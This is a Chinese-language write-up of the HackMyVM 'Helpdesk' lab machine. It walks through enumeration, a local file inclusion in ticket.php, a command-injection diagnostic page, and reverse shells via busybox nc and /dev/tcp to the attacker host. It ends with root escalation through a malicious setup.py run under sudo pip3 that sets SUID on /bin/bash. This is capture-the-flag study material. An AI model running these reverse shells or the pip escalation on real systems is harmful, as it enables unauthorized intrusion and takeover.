Helpdesk

靶机地址：https://hackmyvm.eu/machines/machine.php?vm=Helpdesk

‍

信息搜集

主机发现

root@LAPTOP-O235O5EH [~] ➜  arp-scan -l                                                                      [15:15:56] Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.100.35
Starting arp-scan 1.10.0 with 512 hosts (https://github.com/royhills/arp-scan)
......
192.168.100.76  08:00:27:e5:04:39       PCS Systemtechnik GmbH
......

41 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 512 hosts scanned in 2.888 seconds (177.29 hosts/sec). 38 responded

‍

端口扫描

root@LAPTOP-O235O5EH [~] ➜  rustscan -a 192.168.100.76                                                       [15:16:05]
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
RustScan: Exploring the digital landscape, one IP at a time.

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 10140'.
Open 192.168.100.76:22
Open 192.168.100.76:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-19 15:17 CST
Initiating ARP Ping Scan at 15:17
Scanning 192.168.100.76 [1 port]
Completed ARP Ping Scan at 15:17, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:17
Completed Parallel DNS resolution of 1 host. at 15:17, 6.52s elapsed
DNS resolution of 1 IPs took 6.52s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 3, CN: 0]
Initiating SYN Stealth Scan at 15:17
Scanning 192.168.100.76 [2 ports]
Discovered open port 80/tcp on 192.168.100.76
Discovered open port 22/tcp on 192.168.100.76
Completed SYN Stealth Scan at 15:17, 0.01s elapsed (2 total ports)
Nmap scan report for 192.168.100.76
Host is up, received arp-response (0.00054s latency).
Scanned at 2026-01-19 15:17:37 CST for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:E5:04:39 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 6.65 seconds
           Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

‍

80/tcp

root@LAPTOP-O235O5EH [~] ➜  gobuster dir -u http://192.168.100.76 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt,zip,bak,js,py,sh,swp
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.100.76
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.8
[+] Extensions:              js,py,sh,swp,txt,zip,php,html,bak
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 200) [Size: 1290]
/login.php            (Status: 200) [Size: 1819]
/javascript           (Status: 301) [Size: 241] [--> http://192.168.100.76/javascript/]
/helpdesk             (Status: 301) [Size: 239] [--> http://192.168.100.76/helpdesk/]
/ticket.php           (Status: 200) [Size: 204]
/panel.php            (Status: 302) [Size: 0] [--> login.php]
/debug.php            (Status: 200) [Size: 250]
/server-status        (Status: 403) [Size: 199]
Progress: 2205580 / 2205580 (100.00%)
===============================================================
Finished
===============================================================

/debug.php存在用户凭证但是登录不上

service_user:SuperSecretDev123！

‍

本地文件包含 (LFI)

对/ticket.php进行模糊测试发现了漏洞

root@LAPTOP-O235O5EH [~] ➜  wfuzz -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt -u http://192.168.100.76/ticket.php\?FUZZ\=/etc/passwd --hh 204
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.100.76/ticket.php?FUZZ=/etc/passwd
Total requests: 56162

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000981:   200        40 L     82 W       2135 Ch     "url"

Total time: 0
Processed Requests: 56162
Filtered Requests: 56161
Requests/sec.: 0

读取login.php的源码

1	http://192.168.100.76/ticket.php?url=login.php

‍

登录login.php

一个诊断功能，可以执行系统命令

执行反弹shell

1	busybox nc 192.168.100.35 7777 -e /bin/bash

‍

提权

www shell

在/opt/helpdesk-socket目录下有一个Unix套接字

www-data@helpdesk:/opt/helpdesk-socket$ cat serve.sh
#!/bin/bash

SOCKET="/opt/helpdesk-socket/helpdesk.sock"

[ -e "$SOCKET" ] && rm "$SOCKET"

/usr/bin/socat -d -d UNIX-LISTEN:$SOCKET,fork,mode=777 EXEC:/opt/helpdesk-socket/handler.sh

[ -e "$SOCKET" ]：bash 的文件测试语句，检查 $SOCKET 指向的文件是否存在（-e 是 “exist” 的缩写）。
&&：bash 的逻辑运算符，表示 “前面的命令执行成功（返回值为 0）时，才执行后面的命令”。
rm "$SOCKET"：删除已存在的套接字文件。
整行作用：避免启动时因旧的套接字文件存在导致监听失败（套接字文件不会自动消失，进程退出后仍会残留）。
/usr/bin/socat：socat 工具的完整路径（避免系统环境变量问题导致找不到命令）。
-d -d：开启调试模式，输出详细的日志（两个 -d 表示更高级别的调试，方便排查问题）。
UNIX-LISTEN:$SOCKET：指定 socat 监听Unix 域套接字，监听的文件路径为 $SOCKET。
fork：关键参数，当有客户端连接时，socat 会 fork 一个子进程处理该连接，主进程继续监听新的连接（支持多客户端同时连接）。
mode=777：设置套接字文件的权限为 777（所有用户可读、可写、可执行）
EXEC:/opt/helpdesk-socket/handler.sh：指定当有客户端连接到该套接字时，执行 handler.sh 脚本处理连接的具体逻辑。

www-data@helpdesk:/opt/helpdesk-socket$ cat handler.sh
#!/bin/bash
# Simple parser — executes anything sent over the socket (dangerous!)
read cmd
echo "[HelpDesk Automation] Executing: $cmd"
/bin/bash -c "$cmd"

而这个handler.sh的作用是当serve.sh有客户端连接的时候，必须调用handler.sh来处理，而handler.sh是执行命令的脚本。

‍

www -> helpdesk

在www shell里面执行反弹shell

1	echo "/bin/bash -i >& /dev/tcp/192.168.100.35/8888 0>&1" \| socat - UNIX-CONNECT:/opt/helpdesk-socket/helpdesk.sock

‍

helpdesk -> root

helpdesk@helpdesk:/$ sudo -l
Matching Defaults entries for helpdesk on helpdesk:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User helpdesk may run the following commands on helpdesk:
    (ALL) NOPASSWD: /usr/bin/pip3 install --break-system-packages *

可以使用pip3的–break-system-packages来提权

‍

cd ~
mkdir exp
cd exp
vim setup.py
...
import os
os.system("chmod +s /bin/bash")
...
udo /usr/bin/pip3 install --break-system-packages /home/helpdesk/exp/
/bin/bash -p